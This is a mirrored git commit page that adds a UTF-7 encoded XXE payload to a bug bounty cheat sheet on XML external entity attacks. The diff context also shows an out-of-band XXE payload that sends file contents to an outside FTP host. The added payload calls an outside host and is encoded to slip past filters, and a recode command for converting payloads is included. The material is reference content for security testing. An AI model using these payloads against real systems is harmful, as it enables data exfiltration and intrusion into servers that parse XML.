Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 04:20:19 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #28 from sxcurity/patch-2

Browse source 
Update xxe.md
This commit is contained in:
EdOverflow 2018-01-19 11:34:49 +01:00 committed by GitHub
commit 47c3292888
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
cheatsheets/xxe.md
View file

@ -75,3 +75,12 @@ File stored on http://publicServer.com/parameterEntity_sendftp.dtd
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>"> <!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1; %param1;
``` ```
**XXE UTF-7**
```
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
To convert between UTF-8 & UTF-7 use recode.
`recode UTF8..UTF7 payload-file.xml`